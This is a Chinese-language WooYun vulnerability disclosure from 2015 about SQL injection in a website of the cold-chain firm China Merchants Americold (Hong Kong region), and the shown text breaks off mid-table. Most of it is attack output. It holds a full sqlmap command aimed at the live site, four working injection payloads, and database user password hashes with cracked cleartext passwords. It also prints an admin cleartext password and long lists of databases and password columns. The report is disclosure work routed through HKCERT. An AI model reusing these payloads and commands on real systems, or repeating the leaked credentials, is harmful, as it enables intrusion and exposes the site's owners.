招商美冷某站存在SQL插入攻擊（DBA權限，系統管理員密碼泄露，15萬系統日誌泄露，admin明文密碼泄露）（香港地區）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0153047

漏洞标题：招商美冷某站存在SQL插入攻擊（DBA權限，系統管理員密碼泄露，15萬系統日誌泄露，admin明文密碼泄露）（香港地區）

漏洞作者：路人甲

提交时间：2015-11-09 15:56

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：已交由第三方合作机构(hkcert香港互联网应急协调中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-09：细节已通知厂商并且等待厂商处理中
2015-11-20：厂商已经确认，细节仅向厂商公开
2015-11-30：细节向核心白帽子及相关领域专家公开
2015-12-10：细节向普通白帽子公开
2015-12-20：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

招商美冷由招商局物流集团有限公司（招商物流）和Americold Realty Trust（美冷）合资成立，是国内大型公共冷链服务商。公司依托双方股东在品牌、资本、网络、客户及专业经验等方面的资源优势，致力于为客户提供一体化的冷链服务方案。

详细说明：

地址：http://**.**.**.**/newsinfo.aspx?id=240&nid=6

python sqlmap.py -u "http://**.**.**.**/newsinfo.aspx?id=240&nid=6" -p id --technique=BEQU --random-agent --batch  --current-user --is-dba --users --passwords --count --search -C pass

1. DBA权限，系统管理员密码泄露

current user:    'kaidexuncn'
current user is DBA:    True
database management system users [5]:
[*] dtcms
[*] kaidexuncn
[*] qmkgb
[*] qunxinmoyi
[*] saitell
database management system users password hashes:
[*] dtcms [1]:
    password hash: 0x0100fd111b6c8f75783b8bcf759f2733d9342b44a536b4780044
        header: 0x0100
        salt: fd111b6c
        mixedcase: 8f75783b8bcf759f2733d9342b44a536b4780044
    clear-text password: 123
[*] kaidexuncn [1]:
    password hash: 0x0100c89f692785f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b
        header: 0x0100
        salt: c89f6927
        mixedcase: 85f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b
    clear-text password: 123qwe
[*] qmkgb [1]:
    password hash: 0x01004b95e52c43c7b23218d926dab2b3b0897967bfbf5a69e3f9
        header: 0x0100
        salt: 4b95e52c
        mixedcase: 43c7b23218d926dab2b3b0897967bfbf5a69e3f9
[*] qunxinmoyi [1]:
    password hash: 0x01003ba732eb8d325664842eb725779c2c9db3fbe53580b7554c
        header: 0x0100
        salt: 3ba732eb
        mixedcase: 8d325664842eb725779c2c9db3fbe53580b7554c
[*] saitell [1]:
    password hash: 0x0100a424c77393058000e8c0e0e41d6bc617e93aaa4c95b5b25b
        header: 0x0100
        salt: a424c773
        mixedcase: 93058000e8c0e0e41d6bc617e93aaa4c95b5b25b

2. 15万系统日志泄露

Database: master
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| sys.messages                           | 76640   |
| sys.sysmessages                        | 76640   |

3. admin明文密码泄露

Database: rcsw1
Table: admin
[1 entry]
+----------+
| password |
+----------+
| szhuhang |
+----------+

漏洞证明：

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Parameter replace
    Payload: id=(SELECT (CASE WHEN (9153=9153) THEN 9153 ELSE 9153*(SELECT 9153 FROM master..sysdatabases) END))&nid=6
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=240 AND 6796=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (6796=6796) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113)))&nid=6
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (4067=4067) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113))&nid=6
    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=240 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(112)+CHAR(98)+CHAR(113)+CHAR(122)+CHAR(71)+CHAR(107)+CHAR(100)+CHAR(70)+CHAR(120)+CHAR(122)+CHAR(85)+CHAR(65)+CHAR(72)+CHAR(78)+CHAR(84)+CHAR(115)+CHAR(116)+CHAR(119)+CHAR(83)+CHAR(71)+CHAR(80)+CHAR(109)+CHAR(111)+CHAR(119)+CHAR(82)+CHAR(79)+CHAR(74)+CHAR(84)+CHAR(118)+CHAR(68)+CHAR(81)+CHAR(84)+CHAR(102)+CHAR(70)+CHAR(97)+CHAR(81)+CHAR(105)+CHAR(75)+CHAR(90)+CHAR(107)+CHAR(66)+CHAR(117)+CHAR(73)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(98)+CHAR(113),NULL,NULL-- -&nid=6
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
current user:    'kaidexuncn'
current user is DBA:    True
database management system users [5]:
[*] dtcms
[*] kaidexuncn
[*] qmkgb
[*] qunxinmoyi
[*] saitell
database management system users password hashes:
[*] dtcms [1]:
    password hash: 0x0100fd111b6c8f75783b8bcf759f2733d9342b44a536b4780044
        header: 0x0100
        salt: fd111b6c
        mixedcase: 8f75783b8bcf759f2733d9342b44a536b4780044
    clear-text password: 123
[*] kaidexuncn [1]:
    password hash: 0x0100c89f692785f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b
        header: 0x0100
        salt: c89f6927
        mixedcase: 85f4e211233ed8bd7c1b6e4fc2eeb31e582bd00b
    clear-text password: 123qwe
[*] qmkgb [1]:
    password hash: 0x01004b95e52c43c7b23218d926dab2b3b0897967bfbf5a69e3f9
        header: 0x0100
        salt: 4b95e52c
        mixedcase: 43c7b23218d926dab2b3b0897967bfbf5a69e3f9
[*] qunxinmoyi [1]:
    password hash: 0x01003ba732eb8d325664842eb725779c2c9db3fbe53580b7554c
        header: 0x0100
        salt: 3ba732eb
        mixedcase: 8d325664842eb725779c2c9db3fbe53580b7554c
[*] saitell [1]:
    password hash: 0x0100a424c77393058000e8c0e0e41d6bc617e93aaa4c95b5b25b
        header: 0x0100
        salt: a424c773
        mixedcase: 93058000e8c0e0e41d6bc617e93aaa4c95b5b25b
Database: hckj
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.serverDesc                         | 29      |
| dbo.newsclass                          | 21      |
| dbo.product                            | 19      |
| dbo.project                            | 9       |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
Database: kaidexuncn
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.Product                            | 32      |
| dbo.en_newsclass                       | 16      |
| dbo.newsclass                          | 16      |
| dbo.proclass                           | 14      |
| dbo.newsContent                        | 12      |
| dbo.Members                            | 10      |
| dbo.diaocha                            | 6       |
| dbo.links                              | 4       |
| dbo.downclass                          | 2       |
| dbo.downContent                        | 2       |
| dbo.en_guestbook                       | 2       |
| dbo.admin                              | 1       |
| dbo.city                               | 1       |
| dbo.cooperation                        | 1       |
| dbo.emailInfo                          | 1       |
| dbo.en_newsContent                     | 1       |
| dbo.en_proclass                        | 1       |
| dbo.en_webInfo                         | 1       |
| dbo.toJoin                             | 1       |
| dbo.webInfo                            | 1       |
+----------------------------------------+---------+
Database: cqrhyJapanese
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.product                            | 234     |
| dbo.newsclass                          | 28      |
| dbo.ggt                                | 5       |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
Database: juchikeji
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.newsContent                        | 64      |
| dbo.Product                            | 32      |
| dbo.newsclass                          | 21      |
| dbo.en_newsclass                       | 16      |
| dbo.proclass                           | 14      |
| dbo.Members                            | 10      |
| dbo.diaocha                            | 6       |
| dbo.links                              | 6       |
| dbo.downclass                          | 4       |
| dbo.ApplyCooperation                   | 3       |
| dbo.downContent                        | 2       |
| dbo.en_guestbook                       | 2       |
| dbo.admin                              | 1       |
| dbo.city                               | 1       |
| dbo.cooperation                        | 1       |
| dbo.emailInfo                          | 1       |
| dbo.en_newsContent                     | 1       |
| dbo.en_proclass                        | 1       |
| dbo.en_webInfo                         | 1       |
| dbo.toJoin                             | 1       |
| dbo.webInfo                            | 1       |
+----------------------------------------+---------+
Database: mjkj
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.picView                            | 23      |
| dbo.productPic                         | 23      |
| dbo.productPic                         | 23      |
| dbo.newsclass                          | 22      |
| dbo.proView                            | 21      |
| dbo.feedback                           | 11      |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
Database: qiaolu
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.product                            | 99      |
| dbo.productView                        | 99      |
| dbo.newsclass                          | 26      |
| dbo.feedback                           | 4       |
| dbo.admin                              | 2       |
+----------------------------------------+---------+
Database: msdb
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.MSdbms_datatype_mapping            | 325     |
| dbo.MSdbms_datatype_mapping            | 325     |
| dbo.MSdbms_datatype_mapping            | 325     |
| dbo.sysdatatypemappings                | 325     |
| dbo.MSdbms_map                         | 248     |
| dbo.MSdatatype_mappings                | 174     |
| dbo.syscategories                      | 21      |
| dbo.backupfilegroup                    | 5       |
| dbo.backupfilegroup                    | 5       |
| dbo.backupset                          | 5       |
| dbo.backupmediafamily                  | 3       |
| dbo.backupmediaset                     | 3       |
| dbo.sysdbmaintplans                    | 1       |
+----------------------------------------+---------+
Database: rcsw1
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.newsclass                          | 11      |
| dbo.serverDesc                         | 6       |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
Database: ReportServer
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.ConfigurationInfo                  | 19      |
| dbo.Roles                              | 8       |
| dbo.PolicyUserRole                     | 4       |
| dbo.Users                              | 3       |
| dbo.Keys                               | 2       |
| dbo.Policies                           | 2       |
| dbo.SecData                            | 2       |
| dbo.Catalog                            | 1       |
+----------------------------------------+---------+
Database: master
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| sys.messages                           | 76640   |
| sys.sysmessages                        | 76640   |
| sys.syscolumns                         | 11273   |
| sys.dm_os_buffer_descriptors           | 10596   |
| sys.all_parameters                     | 6761    |
| sys.dm_os_memory_objects               | 5184    |
| sys.all_columns                        | 4307    |
| sys.dm_os_memory_cache_entries         | 3967    |
| sys.system_columns                     | 3749    |
| sys.syscomments                        | 2798    |
| sys.dm_os_ring_buffers                 | 2687    |
| sys.dm_os_virtual_address_dump         | 2506    |
| sys.syscacheobjects                    | 2412    |
| dbo.spt_values                         | 2346    |
| sys.dm_exec_cached_plans               | 2148    |
| sys.all_objects                        | 1841    |
| sys.sysobjects                         | 1841    |
| sys.database_permissions               | 1688    |
| sys.syspermissions                     | 1687    |
| sys.sysprotects                        | 1679    |
| sys.all_sql_modules                    | 1623    |
| sys.dm_os_performance_counters         | 1142    |
| sys.sysperfinfo                        | 1142    |
| sys.dm_db_index_usage_stats            | 846     |
| sys.columns                            | 558     |
| sys.dm_exec_query_transformation_stats | 380     |
| sys.stats_columns                      | 298     |
| sys.stats_columns                      | 298     |
| sys.all_views                          | 286     |
| sys.index_columns                      | 219     |
| sys.sysindexkeys                       | 219     |
| sys.dm_os_memory_cache_clock_hands     | 208     |
| sys.dm_os_wait_stats                   | 202     |
| sys.event_notification_event_types     | 193     |
| sys.dm_os_memory_clerks                | 187     |
| sys.sysindexes                         | 180     |
| sys.dm_os_latch_stats                  | 138     |
| sys.syscharsets                        | 114     |
| sys.allocation_units                   | 112     |
| sys.dm_os_memory_cache_counters        | 104     |
| sys.dm_db_partition_stats              | 101     |
| sys.dm_exec_query_stats                | 101     |
| sys.indexes                            | 101     |
| sys.partitions                         | 101     |
| sys.dm_os_loaded_modules               | 92      |
| sys.objects                            | 68      |
| sys.configurations                     | 63      |
| sys.sysconfigures                      | 63      |
| sys.syscurconfigs                      | 63      |
| sys.dm_os_memory_cache_hash_tables     | 58      |
| INFORMATION_SCHEMA.COLUMNS             | 50      |
| sys.fulltext_document_types            | 50      |
| sys.dm_os_threads                      | 46      |
| sys.master_files                       | 46      |
| sys.sysaltfiles                        | 46      |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES   | 44      |
| sys.dm_exec_query_optimizer_info       | 38      |
| sys.dm_os_worker_local_storage         | 35      |
| sys.dm_os_workers                      | 35      |
| sys.dm_os_memory_pools                 | 34      |
| sys.syslanguages                       | 33      |
| sys.server_principals                  | 27      |
| sys.dm_os_tasks                        | 24      |
| sys.server_permissions                 | 24      |
| sys.database_principals                | 23      |
| sys.database_recovery_status           | 23      |
| sys.databases                          | 23      |
| sys.sysdatabases                       | 23      |
| sys.securable_classes                  | 21      |
| sys.dm_db_session_space_usage          | 20      |
| sys.dm_db_task_space_usage             | 20      |
| sys.dm_exec_sessions                   | 20      |
| sys.dm_tran_active_transactions        | 20      |
| sys.dm_tran_database_transactions      | 20      |
| sys.sysprocesses                       | 19      |
| sys.dm_exec_requests                   | 18      |
| sys.syslogins                          | 18      |
| INFORMATION_SCHEMA.SCHEMATA            | 17      |
| sys.fulltext_languages                 | 17      |
| sys.schemas                            | 17      |
| sys.service_message_types              | 14      |
| sys.dm_os_stacks                       | 13      |
| sys.dm_os_waiting_tasks                | 11      |
| sys.service_contract_message_usages    | 11      |
| sys.server_role_members                | 10      |
| sys.crypt_properties                   | 8       |
| sys.dm_db_missing_index_details        | 7       |
| sys.dm_db_missing_index_group_stats    | 7       |
| sys.dm_db_missing_index_groups         | 7       |
| sys.dm_os_schedulers                   | 7       |
| INFORMATION_SCHEMA.TABLES              | 6       |
| sys.service_contracts                  | 6       |
| sys.sql_logins                         | 6       |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES    | 5       |
| sys.certificates                       | 5       |
| sys.endpoints                          | 5       |
| sys.database_role_members              | 4       |
| sys.procedures                         | 4       |
| sys.sysmembers                         | 4       |
| dbo.MSreplication_options              | 3       |
| sys.dm_clr_properties                  | 3       |
| sys.dm_os_hosts                        | 3       |
| sys.identity_columns                   | 3       |
| sys.internal_tables                    | 3       |
| sys.login_token                        | 3       |
| sys.service_queue_usages               | 3       |
| sys.service_queues                     | 3       |
| sys.services                           | 3       |
| sys.syssegments                        | 3       |
| INFORMATION_SCHEMA.ROUTINES            | 2       |
| sys.database_files                     | 2       |
| sys.dm_broker_queue_monitors           | 2       |
| sys.dm_exec_query_resource_semaphores  | 2       |
| sys.dm_fts_memory_pools                | 2       |
| sys.dm_tran_locks                      | 2       |
| sys.extended_procedures                | 2       |
| sys.key_encryptions                    | 2       |
| sys.service_contract_usages            | 2       |
| sys.sql_modules                        | 2       |
| sys.sysfiles                           | 2       |
| sys.syslockinfo                        | 2       |
| dbo.spt_monitor                        | 1       |
| sys.data_spaces                        | 1       |
| sys.default_constraints                | 1       |
| sys.dm_db_file_space_usage             | 1       |
| sys.dm_exec_background_job_queue_stats | 1       |
| sys.dm_exec_background_job_queue_stats | 1       |
| sys.dm_exec_connections                | 1       |
| sys.dm_os_sys_info                     | 1       |
| sys.dm_tran_current_transaction        | 1       |
| sys.filegroups                         | 1       |
| sys.linked_logins                      | 1       |
| sys.routes                             | 1       |
| sys.servers                            | 1       |
| sys.symmetric_keys                     | 1       |
| sys.sysconstraints                     | 1       |
| sys.sysfilegroups                      | 1       |
| sys.sysoledbusers                      | 1       |
| sys.sysservers                         | 1       |
+----------------------------------------+---------+
Database: saitell
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.ams_Log                            | 100     |
| dbo.ams_ModuleAuthorization            | 52      |
| dbo.ams_ModuleAuthorization            | 52      |
| dbo.ams_RoleAuthorization              | 25      |
| dbo.ams_RoleAuthorization              | 25      |
| dbo.cms_Context                        | 22      |
| dbo.cms_Catalog                        | 17      |
| dbo.cms_Product                        | 11      |
| dbo.cms_File                           | 8       |
| dbo.ams_ModuleConfiguration            | 6       |
| dbo.ams_Member                         | 3       |
| dbo.cms_Image                          | 3       |
| dbo.ams_AuthorizationType              | 2       |
+----------------------------------------+---------+
Database: siyi
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.newsclass                          | 14      |
| dbo.cms_Catalog                        | 12      |
| dbo.ggt                                | 9       |
| dbo.product                            | 5       |
| dbo.brandPic                           | 4       |
| dbo.brandPic                           | 4       |
| dbo.pictures                           | 4       |
| dbo.cms_Makeup                         | 2       |
| dbo.admin                              | 1       |
| dbo.leaveComments                      | 1       |
+----------------------------------------+---------+
Database: zhaoshangmeileng
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.newsContent                        | 173     |
| dbo.Product                            | 32      |
| dbo.newsclass                          | 22      |
| dbo.en_newsclass                       | 16      |
| dbo.proclass                           | 14      |
| dbo.Members                            | 10      |
| dbo.diaocha                            | 6       |
| dbo.downclass                          | 4       |
| dbo.syscommand                         | 3       |
| dbo.admin                              | 2       |
| dbo.downContent                        | 2       |
| dbo.en_guestbook                       | 2       |
| dbo.links                              | 2       |
| dbo.LSB                                | 2       |
| dbo.system32                           | 2       |
| dbo.city                               | 1       |
| dbo.cooperation                        | 1       |
| dbo.emailInfo                          | 1       |
| dbo.en_newsContent                     | 1       |
| dbo.en_proclass                        | 1       |
| dbo.en_webInfo                         | 1       |
| dbo.toJoin                             | 1       |
| dbo.webInfo                            | 1       |
+----------------------------------------+---------+
Database: cqrhyEnglish
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.product                            | 234     |
| dbo.newsclass                          | 28      |
| dbo.ggt                                | 5       |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
Database: qmkgb
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.Blog_SiteLogs                      | 24608   |
| dbo.Sys_Elink                          | 3479    |
| dbo.v_Blog_SiteLogsDetail_ByIP         | 2135    |
| dbo.blog_Tag                           | 1028    |
| dbo.v_Blog_Tag                         | 1028    |
| dbo.blog_Keyword                       | 681     |
| dbo.Blog_SiteLoginLogs                 | 478     |
| dbo.Sys_ExpressCountry                 | 226     |
| dbo.Sys_ExpressCountry                 | 226     |
| dbo.v_Blog_SiteLogsCount_ByTagName     | 221     |
| dbo.v_Use_Photo                        | 211     |
| dbo.blog_ArticlePhoto                  | 209     |
| dbo.v_Blog_ArticlePhoto                | 209     |
| dbo.blog_ArticleTag                    | 204     |
| dbo.menu                               | 198     |
| dbo.blog_ArticleRelatedTwo             | 108     |
| dbo.Blog_ArticleSmall                  | 86      |
| dbo.Blog_ArticleMemo                   | 83      |
| dbo.blog_Menu                          | 83      |
| dbo.blog_ArticleRelated                | 67      |
| dbo.v_Use_Tag                          | 46      |
| dbo.blog_Category                      | 42      |
| dbo.Blog_CategorySmall                 | 42      |
| dbo.v_Blog_Category                    | 42      |
| dbo.blog_NavigationDetail              | 34      |
| dbo.blog_NavigationDetail              | 34      |
| dbo.v_Blog_ArticleTag_BestLogUrl       | 21      |
| dbo.v_Blog_ArticleTag_BestLogUrl       | 21      |
| dbo.blog_ArticleTypePhoto              | 19      |
| dbo.v_blog_ArticleTag_Tag              | 18      |
| dbo.Blog_SiteParamter                  | 16      |
| dbo.blog_TemplateType                  | 8       |
| dbo.blog_MasterPage                    | 7       |
| dbo.Ad_AdType                          | 6       |
| dbo.blog_CommentDoc                    | 6       |
| dbo.blog_CommentDoc                    | 6       |
| dbo.blog_CommentType                   | 6       |
| dbo.blog_FinishersType                 | 6       |
| dbo.blog_PageType                      | 5       |
| dbo.Ad_AdDetail                        | 4       |
| dbo.Ad_AdGroup                         | 4       |
| dbo.blog_ArticleFlag                   | 4       |
| dbo.blog_NavigationType                | 4       |
| dbo.blog_ArticleTypeField              | 3       |
| dbo.blog_ArticleTypeField              | 3       |
| dbo.blog_Flag                          | 3       |
| dbo.blog_ArticleTypeFieldType          | 2       |
| dbo.Blog_Member_Power                  | 2       |
| dbo.blog_Origin                        | 2       |
| dbo.blog_SiteSetting                   | 1       |
| dbo.blog_TagType                       | 1       |
| dbo.blog_Theme                         | 1       |
+----------------------------------------+---------+
Database: Muban
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.Channel                            | 42      |
| dbo.Products                           | 33      |
| dbo.Product_album                      | 12      |
| dbo.查询5                                  | 10      |
| dbo.MyContent                          | 6       |
| dbo.MyKey                              | 5       |
| dbo.QQ                                 | 5       |
| dbo.Article_comment                    | 3       |
| dbo.Article_comment                    | 3       |
| dbo.Contents                           | 3       |
| dbo.DingDan                            | 3       |
| dbo.PageMessage                        | 3       |
| dbo.Adbanner                           | 2       |
| dbo.HY_User                            | 2       |
| dbo.MyData                             | 2       |
| dbo.Administrator                      | 1       |
| dbo.Advertising                        | 1       |
| dbo.ArticleEdit                        | 1       |
| dbo.Comment                            | 1       |
| dbo.Feedback                           | 1       |
| dbo.Links                              | 1       |
| dbo.ShoppingCart                       | 1       |
| dbo.查询3                                  | 1       |
+----------------------------------------+---------+
Database: yideng_data
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.CB_Area                            | 2911    |
| dbo.CB_Log                             | 1700    |
| dbo.CB_Productdigg                     | 566     |
| dbo.CB_City                            | 340     |
| dbo.CB_ProPic                          | 184     |
| dbo.CB_ProClass                        | 144     |
| dbo.CB_AdminMenu                       | 69      |
| dbo.CB_ShopList                        | 60      |
| dbo.CB_Member_Product                  | 40      |
| dbo.CB_Partners                        | 40      |
| dbo.CB_Trade                           | 37      |
| dbo.CB_Province                        | 35      |
| dbo.CB_OrderList                       | 28      |
| dbo.CB_ReplyProduct                    | 22      |
| dbo.CB_GuestBook                       | 17      |
| dbo.CB_Snapping_Product                | 16      |
| dbo.CB_Snapping_Product                | 16      |
| dbo.V_Product_Reply                    | 16      |
| dbo.CB_HotKey                          | 15      |
| dbo.Web_Content                        | 15      |
| dbo.CB_Prize                           | 14      |
| dbo.V_PrizeCount                       | 14      |
| dbo.CB_NewsClass                       | 12      |
| dbo.CB_NewsClass                       | 12      |
| dbo.CB_Member_ProClass                 | 11      |
| dbo.CB_SEO                             | 11      |
| dbo.Article_reply                      | 10      |
| dbo.CB_PointLog                        | 10      |
| dbo.CB_Member_News                     | 9       |
| dbo.CB_Member_News                     | 9       |
| dbo.CB_FriendLink                      | 7       |
| dbo.CB_Store                           | 7       |
| dbo.CB_UserPrize                       | 7       |
| dbo.V_UserPrize                        | 7       |
| dbo.CB_MemberGroup                     | 6       |
| dbo.CB_FaqClass                        | 5       |
| dbo.CB_FaqClass                        | 5       |
| dbo.CB_Product_Guest                   | 4       |
| dbo.CB_Product_Guest                   | 4       |
| dbo.CB_Sales                           | 4       |
| dbo.CB_ShippingAddress                 | 4       |
| dbo.CB_Admin_Group                     | 3       |
| dbo.CB_Admin_Group                     | 3       |
| dbo.CB_Discount                        | 3       |
| dbo.CB_Brand                           | 2       |
| dbo.CB_OrderShip                       | 2       |
| dbo.CB_UserFav                         | 2       |
| dbo.CB_DataBack                        | 1       |
| dbo.CB_EmailListGroup                  | 1       |
| dbo.CB_EmailListGroup                  | 1       |
| dbo.CB_EmailListGroup                  | 1       |
| dbo.CB_EmailTask                       | 1       |
| dbo.CB_Package                         | 1       |
| dbo.CB_Smtp                            | 1       |
| dbo.CB_WEBINFO                         | 1       |
| dbo.V_UserFav                          | 1       |
+----------------------------------------+---------+
Database: yrw
+----------------------------------------+---------+
| Table                                  | Entries |
+----------------------------------------+---------+
| dbo.setBgPic                           | 147     |
| dbo.product                            | 90      |
| dbo.newsclass                          | 40      |
| dbo.leaveComments                      | 13      |
| dbo.cms_Catalog                        | 6       |
| dbo.cms_Resource                       | 6       |
| dbo.downclass                          | 3       |
| dbo.downContent                        | 3       |
| dbo.emailSend                          | 2       |
| dbo.admin                              | 1       |
+----------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hckj
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: hckj
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: hckj
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: hckj
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: hckj
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: hckj
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: hckj
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: hckj
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: kaidexuncn
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: kaidexuncn
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: kaidexuncn
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: kaidexuncn
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: kaidexuncn
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: kaidexuncn
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: kaidexuncn
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: kaidexuncn
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: cqrhyJapanese
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: cqrhyJapanese
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cqrhyJapanese
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: cqrhyJapanese
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: cqrhyJapanese
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: cqrhyJapanese
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: cqrhyJapanese
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: cqrhyJapanese
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: juchikeji
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: juchikeji
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: juchikeji
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: juchikeji
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: juchikeji
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: juchikeji
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: juchikeji
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: juchikeji
Table: admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: mjkj
Table: en_pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: mjkj
Table: Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: mjkj
Table: en_Members
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| password | varchar |
+----------+---------+
Database: mjkj
Table: pay
[1 column]
+----------+---------+
| Column   | Type    |
+----------+---------+
| userPass | varchar |
+----------+---------+
Database: mjkj
Table: en_admin
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| password | nvarchar |
+----------+----------+
Database: mjkj
Table: en_emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
+----------+----------+
| sendPass | nvarchar |
+----------+----------+
Database: mjkj
Table: emailInfo
[1 column]
+----------+----------+
| Column   | Type     |
